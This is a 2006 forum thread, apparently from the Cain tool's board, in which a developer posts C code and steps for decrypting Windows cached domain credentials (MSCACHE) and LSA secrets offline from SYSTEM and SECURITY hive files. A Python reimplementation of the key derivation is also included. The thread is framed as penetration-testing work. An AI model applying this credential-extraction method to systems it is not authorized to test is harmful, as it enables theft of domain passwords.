Page 1 of 1
[ 10 posts ]

ms cache import from reg files
itsMe
Joined: 13 Nov 2006, 13:17 Posts: 13
ms cache import from reg files
I'm a user of the fantastic Cain for a long time ;)
I'd like to import the MSCACHE directly from reg files (gained from a boot CD). The SAM, SECURITY and SYSTEM files should have all the information needed to extract those hashes (hopefully). This feature is very similar to ophcrack's load from encrypted SAM, or like in Cain itself, getting LM hashes from a SAM file. Importing hashes directly from the mentioned reg files would be a huge improvement when pentesting other systems (as I can crack them all on one central PC). Would it be possible to add such a function?
Thanks for your effort and great work
13 Nov 2006, 13:22

mao
Joined: 20 Oct 2006, 02:24 Posts: 598
To do that you need to successfully decode the NL$KM key in the "SECURITY" hive file. Using bkhive code this value can be retrieved using the following code:
#include <string.h>
/* struct hive, nk_hdr, _InitHive, _RegOpenHive and _RegOpenKey come from the bkhive hive-file reader */

struct hive h;
nk_hdr *n = NULL;
char lsasecret_nlkm_key[1024];
_InitHive( &h );

/* Open the SECURITY hive file */
if( _RegOpenHive("D:\\security", &h ) ) {
    // AfxMessageBox("Error opening SECURITY file");
    return;
}

/* Open the SECURITY\Policy\Secrets\NL$KM\CurrVal key */
strcpy (lsasecret_nlkm_key,"SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal");
if( _RegOpenKey( &h, lsasecret_nlkm_key, &n ) == -1 ) {
    // AfxMessageBox ("Couldn't open current LSA Secret key");
    return;
}

/* 84 bytes: the encrypted NL$KM value as stored in the hive */
unsigned char buffer[64+8+12];
DWORD offset = n->unk4[3];   /* offset of the value data relative to the nk record */
memcpy (buffer, (unsigned char*) n+offset+4, sizeof(buffer));
The content of "buffer" must now be decrypted. Cain uses the DLL injection method to obtain the unencrypted value, but if you want to get it from hive files you can't dump it immediately from the memory ..... Normally this decryption is done by the operating system by means of the function SystemFunction005 of ADVAPI32.DLL.
SystemFunction005( NL$KM from the registry, 16_bytes_in_memory_key, nlkmkey )   // nlkmkey is the output of 64 bytes
The information you do not have here is the "16_bytes_in_memory_key" and you can't dump this value from the memory because you are working on hive files and usually a different operating system. CacheDump uses the function "getCipherKey" to obtain this parameter directly from the process memory of LSASS.
Supposing that you can successfully obtain the 64 byte value of the decrypted NL$KM key, MSCACHE hashes can be decrypted using the following function as explained in CacheDump code....
#include <openssl/rc4.h>
/* HMAC_MD5(text, text_len, key, key_len, digest) is CacheDump's own helper */

// Decipher the Cache Entry using the LSA Secret NL$KM
int DecryptCacheEntry (unsigned char* data, int datalen, unsigned char* nlkmkey) // 64 bytes NL$KM decrypted key
{
    unsigned char digest[ 16 ];
    RC4_KEY rc4key;

    // the entry starts with the user name length; an empty slot is skipped
    short user_len = *(short*) (data);
    if (user_len<=0) return 0;
    // the encrypted part begins at offset 96
    if (datalen < 96) return 0;

    // HMAC-MD5 of the 16-byte random value (offset 64) keyed with NL$KM
    HMAC_MD5 (data+64,16,nlkmkey,64,digest);

    // RC4 decryption of the data with the above digest
    RC4_set_key (&rc4key,16,digest);
    RC4(&rc4key,datalen-96,data+96,data+96);

    return datalen;
}
It seems that everything you need to do is to discover how the "16_bytes_in_memory_key" has been created and if it is possible to replicate that generation process.....
15 Nov 2006, 00:00

itsMe
Joined: 13 Nov 2006, 13:17 Posts: 13
Thanks for that excellent explanation.
mao wrote: ... It seems that everything you need to do is to discover how the "16_bytes_in_memory_key" has been created and if it is possible to replicate that generation process.....
Well, that seems to be a big task ... I didn't know that this kind of key is missing when working with files only. To get a clue in the opposite direction: may I regard a domain system without any local (admin) users as rather secure? As it seems to be impossible to run CacheDump successfully on that system (except using 0-day exploits) ...
15 Nov 2006, 08:46

mao
Joined: 20 Oct 2006, 02:24 Posts: 598
Please don't give up so fast! I'm looking for a way to let your wishes come true ..... If any users have information about this task, please post it.
15 Nov 2006, 21:48

itsMe
Joined: 13 Nov 2006, 13:17 Posts: 13
Great news! I will stay tuned :) Wish you luck completing this task.
16 Nov 2006, 08:38

mao
Joined: 20 Oct 2006, 02:24 Posts: 598
Your wishes come true !!!! I found the correct way to decrypt MS-CACHE hashes and all other LSA Secrets using SYSTEM and SECURITY hive files only !!!!!
1) First of all you have to recover the syskey (startkey) of 16 bytes from the SYSTEM file; BKHIVE code is already available on the Internet ...
2) Recover from the SECURITY hive file the value under SECURITY\Policy\PolSecretEncryptionKey; this value is 76 bytes long and must be interpreted as follows:
unsigned char pol_secret_enc_key[76] = 8 bytes + 4 bytes + 48 encrypted bytes + 16 bytes;
3) Now you have to decode the encrypted 48 bytes with the following algorithm (MD5 and RC4 from OpenSSL):
#include <string.h>
#include <openssl/md5.h>
#include <openssl/rc4.h>

MD5_CTX ctx;
RC4_KEY rc4_key;
unsigned char final [16];
unsigned char decrypted[48];
memset (decrypted,0,sizeof(decrypted));

/* RC4 key = MD5( startkey || trailing 16 bytes repeated 1000 times ) */
MD5_Init (&ctx);
MD5_Update (&ctx, startkey ,16);                       /* 16-byte syskey from the SYSTEM hive */
for (int i=0; i<1000; i++) {
    MD5_Update (&ctx, pol_secret_enc_key+60 ,16);      /* the last 16 bytes of the value */
}
MD5_Final (final, &ctx);

/* decrypt the 48 encrypted bytes that start at offset 12 */
RC4_set_key(&rc4_key,16,final);
RC4(&rc4_key, 48, pol_secret_enc_key+12 ,decrypted);

/* the 16 bytes at offset 16 of the plaintext are the cipherKey */
unsigned char cipherKey[16];
memcpy(cipherKey,decrypted+16,16);
The cipherKey is now the exact equivalent of the key dumped from the memory by the function _getCipherKey (lsastuff.c) of the CacheDump software.
4) You can now use the cipherKey to decrypt the NL$KM value of 64 bytes from the SECURITY hive file.
5) Finally you can decrypt MS-CACHE hashes as explained in CacheDump code.
That's all.
To the makers of "Lsadump2" and "CacheDump 1.2": you are free to use the above method to improve your software with the ability to extract information from hive files only ....
17 Nov 2006, 00:55

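Step 3 of the procedure above, written out as a stand-alone Python example (added here; it is not code from the thread, from Cain or from CacheDump): the RC4 key is MD5 over the 16-byte syskey followed by the value's trailing 16 bytes hashed 1000 times, the 48 bytes at offset 12 are RC4-decrypted, and bytes 16..31 of the plaintext are the cipherKey. All inputs are constructed in the block itself so the recovery can be checked end to end; this is the XP/2003-era scheme the thread discusses, since Windows Vista and later protect LSA secrets with AES instead.

```python
import hashlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def pol_secret_rc4_key(startkey: bytes, pol_secret_enc_key: bytes) -> bytes:
    """MD5(startkey || salt * 1000), where salt is the last 16 bytes of the 76-byte value."""
    if len(startkey) != 16 or len(pol_secret_enc_key) != 76:
        raise ValueError("need a 16-byte syskey and a 76-byte PolSecretEncryptionKey value")
    md5 = hashlib.md5(startkey)
    salt = pol_secret_enc_key[60:76]
    for _ in range(1000):
        md5.update(salt)
    return md5.digest()


def recover_cipher_key(startkey: bytes, pol_secret_enc_key: bytes) -> bytes:
    """RC4-decrypt the 48 bytes at offset 12; the cipherKey is bytes 16..31 of the plaintext."""
    plaintext = rc4(pol_secret_rc4_key(startkey, pol_secret_enc_key), pol_secret_enc_key[12:60])
    return plaintext[16:32]


# Constructed sample data (not taken from any real system): a known 16-byte cipherKey is
# wrapped into a value with the layout 8 + 4 + 48 encrypted + 16 so the recovery can be verified.
SAMPLE_SYSKEY = bytes(range(16))
SAMPLE_CIPHER_KEY = b"constructed-key!"
SAMPLE_SALT = b"\xa5" * 16


def build_sample_value(startkey: bytes, cipher_key: bytes, salt: bytes) -> bytes:
    header = b"\x00" * 12                                  # 8 + 4 header bytes
    plaintext48 = b"\x11" * 16 + cipher_key + b"\x22" * 16
    shell = header + b"\x00" * 48 + salt                   # only the salt feeds the key schedule
    return header + rc4(pol_secret_rc4_key(startkey, shell), plaintext48) + salt


SAMPLE_VALUE = build_sample_value(SAMPLE_SYSKEY, SAMPLE_CIPHER_KEY, SAMPLE_SALT)

if __name__ == "__main__":
    print(recover_cipher_key(SAMPLE_SYSKEY, SAMPLE_VALUE).hex())
```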
itsMe
Joined: 13 Nov 2006, 13:17 Posts: 13
Wow! Your speed and skill solving this task beat all my expectations. I'm very impressed and glad you got this done!!!
Just two questions:
a) beginner's question: where can the mentioned types (MD5_CTX, RC4_KEY) and functions (MD5_Init, ...) be found? I doubt these are standard C funcs and types.
b) Cain fan question: when will the new release of Cain with this feature be out?
Once again: great work! This is a huge jump for security tools!
17 Nov 2006, 08:53

mao
Joined: 20 Oct 2006, 02:24 Posts: 598
Quote: a) beginner's question: where can the mentioned types (MD5_CTX, RC4_KEY) and functions (MD5_Init, ...) be found? I doubt these are standard C funcs and types.
They are cryptographic functions you can find in the OpenSSL software.
Quote: b) Cain fan question: when will the new release of Cain with this feature be out?
As soon as possible, time permitting.
17 Nov 2006, 18:00

mao
Joined: 20 Oct 2006, 02:24 Posts: 598
The new version (3.9) featuring offline MSCACHE dumper is online.
18 Nov 2006, 00:03

itsMe
Joined: 13 Nov 2006, 13:17 Posts: 13
Thank you very much for your superb work!
18 Nov 2006, 23:13